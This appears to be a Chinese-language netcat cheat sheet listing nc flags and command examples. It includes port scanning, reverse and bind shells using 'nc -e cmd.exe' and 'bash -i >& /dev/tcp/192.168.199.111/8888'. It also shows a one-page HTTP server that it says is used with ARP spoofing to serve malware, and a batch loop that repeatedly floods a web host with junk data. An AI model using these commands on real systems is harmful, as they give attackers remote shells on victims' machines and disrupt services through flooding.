0、简介
nc被誉为网络中的瑞士军刀,nc的用途和使用方法多种多样。
参数:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| -h 查看帮助信息
-d 后台模式
-e prog程序重定向,一但连接就执行[危险]
-i secs延时的间隔
-l 监听模式,用于入站连接
-L 监听模式,连接天闭后仍然继续监听,直到CTR+C
-n IP地址,不能用域名
-o film记录16进制的传输
-p [空格]端口 本地端口号
-r 随机本地及远程端口
-t 使用Telnet交互方式
-u UDP模式
-v 详细输出,用-vv将更详细
-w 数字 timeout延时间隔
-z 将输入,输出关掉(用于扫锚时)
|
1、使用方法
1
2
3
4
5
6
7
8
|
nc.exe -nvv -w2 -z 192.168.199.111 3385-3399
nc.exe -lvp 8888 //监听
nc.exe -t -e cmd.exe 192.168.199.152 8888 //反弹
nc -lvp 8888 //监听
bash -i >& /dev/tcp/192.168.199.111/8888 0>&1 //反弹
|
2、进阶使用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
nc -L -p 3389>c:\log.txt
nc -L -p 3389<c:\payload.txt
nc -l -p 8888 -t -e cmd.exe
绑定cmd反向连接192.168.199.111的888端口以TELNET方式应答
nc -t -e cmd.exe 192.168.199.111 888
nc -vv www.xx.com 80<xx.asp
nc -nvv 192.168.199.111 80<1.txt
nc -l -p 80<index.html //index.htm为主页文件
注:此法只能架设简单的HTTP服务器,只有一个主页页面,多人访问还会假死。
所以只能玩玩用。(但是此法经常用于局域网ARP欺骗挂马架设简易HTTP)
nc -vv www.xxx.com 80<1.txt //1.txt中为垃圾信息
注:可以简单的用一个批处理实现循环攻击
@echo off
color a
:1
cls
nc -vv www.xxx.com 80<1.txt
goto 1
|
因为windows和Linux的编码不同,这里有些乱码,可以通过( chcp 65001 )修改过来。